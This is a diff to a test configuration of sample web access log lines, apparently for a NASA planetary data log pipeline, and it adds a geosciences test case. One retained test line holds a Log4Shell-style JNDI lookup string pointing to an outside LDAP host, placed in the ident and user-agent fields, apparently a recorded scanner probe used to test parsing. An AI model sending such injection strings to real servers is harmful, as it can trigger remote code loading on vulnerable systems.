--- a/tests/config/test-input-https.conf
+++ b/tests/config/test-input-https.conf
@@ -76,7 +76,11 @@ input {
       # IMG Test Cases for query parameter handling
       '10.1.3.214 - - [17/Jan/2025:03:06:45 -0800] "GET /solr/pds_archives/select?q=*%3A*&fq=-ATLAS_THUMBNAIL_URL%3Abrwsnotavail.jpg&facet=true&facet.method=enum&df=_text_&facet.limit=-1&facet.mincount=1&rows=24&sort=START_TIME%20desc&facet.date=START_TIME&facet.date.start=1976-07-20T00%3A00%3A00.000Z%2FDAY&facet.date.end=2020-10-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B5YEAR&facet.field=RELEVANT_DOC_FIELDS&wt=json&json.wrf=jQuery110207009071242908849_1737075837041&_=1737075837044 HTTP/1.1" 200 204170 "-" "Mozilla onEvent=X162356856Y3_3Z"',
       '10.1.3.214 - - [17/Jan/2025:03:06:43 -0800] "GET /solr/pds_archives/select?fq=ATLAS_MISSION_NAME%3Ainsight&fq=-ATLAS_THUMBNAIL_URL%3Abrwsnotavail.jpg&q=*%3A*&facet=true&facet.field=TARGET&facet.field=ATLAS_MISSION_NAME&facet.field=ATLAS_INSTRUMENT_NAME&facet.field=ATLAS_SPACECRAFT_NAME&facet.field=PRODUCT_TYPE&facet.field=MAP_PROJECTION_TYPE&facet.field=EYE&facet.field=FRAME_TYPE&facet.field=IMAGE_TYPE&facet.field=FILTER_NAME&facet.field=MSL_IMAGE_CLASS&facet.field=CASSINI_IMAGE_CLASS&facet.field=GALILEO_IMAGE_CLASS&facet.field=MRO_IMAGE_CLASS&facet.field=MER_IMAGE_CLASSES&facet.method=enum&df=_text_&facet.limit=-1&facet.mincount=1&rows=24&sort=START_TIME%20desc&facet.date=START_TIME&facet.date.start=1976-07-20T00%3A00%3A00.000Z%2FDAY&facet.date.end=2020-10-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B5YEAR&wt=json&json.wrf=jQuery110206386842003086212_1737075894821&_=1737075894823 HTTP/1.1" 200 55409 "-" "Mozilla onEvent=X2950729636Y3_3Z"',
-      '207.151.104.172 ${jndi:ldap://207.151.104.172:57904/nessus} - [30/Aug/2024:08:04:26 -0700] "GET / HTTP/1.1" 301 169 "http://planetarydata.jpl.nasa.gov/" "${jndi:ldap://207.151.104.172:57904/nessus}"'
+      '207.151.104.172 ${jndi:ldap://207.151.104.172:57904/nessus} - [30/Aug/2024:08:04:26 -0700] "GET / HTTP/1.1" 301 169 "http://planetarydata.jpl.nasa.gov/" "${jndi:ldap://207.151.104.172:57904/nessus}"',
+
+      # GEO Test Cases
+      '65.108.2.73 - - [12/Dec/2024:06:00:03 -0800] "GET /speclib/urn-nasa-pds-relab/data_reflectance/ftir1/1101s549.xml HTTP/1.1" 200 9797 "https://pds-geosciences.wustl.edu/speclib/urn-nasa-pds-relab/data_reflectance/ftir1/" "Mozilla/5.0+(compatible;+SeekportBot;++https://bot.seekport.com)"'
+
     ]
     # Add fields at input stage
     add_field => {
